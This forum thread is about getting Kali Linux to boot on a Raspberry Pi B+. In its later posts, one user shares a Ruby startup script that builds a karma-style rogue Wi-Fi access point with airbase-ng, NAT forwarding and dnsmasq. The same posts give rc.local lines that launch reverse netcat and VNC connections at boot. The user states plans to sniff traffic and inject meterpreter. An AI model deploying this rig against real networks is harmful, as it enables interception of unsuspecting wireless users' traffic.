Kali on Raspberry Pi B+ wont boot

Geoff0ne

Hola,

Has anyone successfully installed Kali on the new B+ raspberry and please advise how you did it?

Im not 100% but i think the current Kali raspberry pi image doesnt work with the B+ after imaging from various OS's to the microSD for the raspberry.

I would ask on Kalis forums, but they dont approve new postings.

I know the B+ requires a new kernel to handle the USB hub and the NIC so unless the Kali release date is after the B+ release date it won' work I guess. If you have B you could try installer there. Doing apt-get update and apt-get dist-upgrade and then trying the SD card in a B+ or just wait for a new Kali build.

Did you manage to get it to work with another distrobution?

You used the ARM version right?

Yes. Tested another Distro on two seperate micro SD cards - booted fine.

I know the B+ requires a new kernel to handle the USB hub and the NIC so unless the Kali release date is after the B+ release date it won' work I guess. If you have B you could try installer there. Doing apt-get update and apt-get dist-upgrade and then trying the SD card in a B+ or just wait for a new Kali build.

I was hoping not to wait for another build.

Could you perhaps elaborate on the "it doesn't work" situation?

Do lights turn on, does the screen show anything at any stage in the process.... That sort of thing.

• 2 weeks later...

Could you perhaps elaborate on the "it doesn't work" situation?

Do lights turn on, does the screen show anything at any stage in the process.... That sort of thing.

Followed this guide here to burn the image to a microSD

http://www.r00tsec.com/2013/04/howto-installing-kali-in-raspberry-pi.html

Powered on raspberry connected to monitor via HDMI. Not picture on monitor. The red and green lights on the Pi remain on.

Tested on Kali Pi images 1.0.6 and 1.0.7 no go.

I would like to see what tone has planned...

My plans are all about startup scripts.

Airbase foo. If wlan0 exist; broadcast some stuff. sniff some stuff. inject meterpreter. Ssl decrypt still need some poc. Maybe some beef.

ill try to keep my scripts clean so ill share them here

mine booted fine. BUT I think this image is missing somebasic bBluetooth stuff, because my wireless keyboard don't work... I am sitting at the login with no working keyboard.

So I thought I could mount the sd card on my labtop and setup a rc script for netcat... any ideas here I think chmod/file permission will prevent this from working?

Edited by i8igmac

Yeah im having the same issue.

wired and wireless keyboard wont work but i can see they are detected when booting.

Tried a powered USB hub and changed the power adaptor to the pi still no win.

has nay one had problems with raspbian connecting to a open wifi access point...

iwconfig wlan0 essid "open_ap"

dhclient wlan0 (hangs for a while and does nothing)

i feel super frustrated... this one step away from going mobile

i got my phone on wifi teathering.. open access point

Ok, ill show what i have so far...

first on my droid phone ill start up mobile hot spot.

Now power up the pi, it will auto connect to my phone's wifi access point, i then can ssh into the pi from my droid phone ,-)

my pi has a /etc/rc.local script below that starts up some airbase-ng -P (karma like kungfu)

my pi is now ready to go mobile, fake ap stuff here... ready to sniff or inject. . . what ever my heart desiers

apt-get install dnsmasq

apt-get install wicd

wicd-curses (i had to start up from a terminal wicd and chose connection with my droid phone this then configured the config files for saved networks... ifpluged is the default service doing network stuff and is CRAP. stop the service and restart wicd)

Save this ruby script as wifi_up.rb

change the device="wlan0" to your current working device that suports monitormode... also Note the full path to airbase executable may need changed

device="wlan0" #wireless

for i in 0..1000
	if not `iwconfig`.include?(device)
		puts "#{device} was not found"
		sleep 3
		redo
	end

system("service networking stop")
system("iwconfig wlan0 essid SCH-bigmac")
system("dhclient wlan0")
system("iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain")
system("iptables --table nat --append POSTROUTING --out-interface #{device} -j MASQUERADE")
system("iptables --append FORWARD --in-interface at0 -j ACCEPT")
system("echo 1 > /proc/sys/net/ipv4/ip_forward")
system("/usr/local/sbin/airmon-ng start #{device}")
system("/usr/local/sbin/airbase-ng mon0 -P -C 60 -c 6 >> airbase_log &")
sleep 6
system("echo 'dhcp-range=192.168.96.50,192.168.96.150,12h' > /etc/dnsmasq.conf")
system("ifconfig at0 192.168.96.1 up")
system("pkill dnsmasq")
system("dnsmasq")

exit
end

nano /etc/rc.local

add a new line to your start up script

su - root -c "bash /root/.bash/reverse-vnc > /dev/null 2>&1 &"
bash /root/.bash/reverse-netcat > /dev/null 2>&1 &
ruby /root/projects/wifi_up/wifi_up.rb

with a proper power supply and mobile hotspot running on my droid phone, i just power the device on and its like a raspberry pi reverse connect to my droid ,-)

i need to make some fixes but the idea is there...

Edited by i8igmac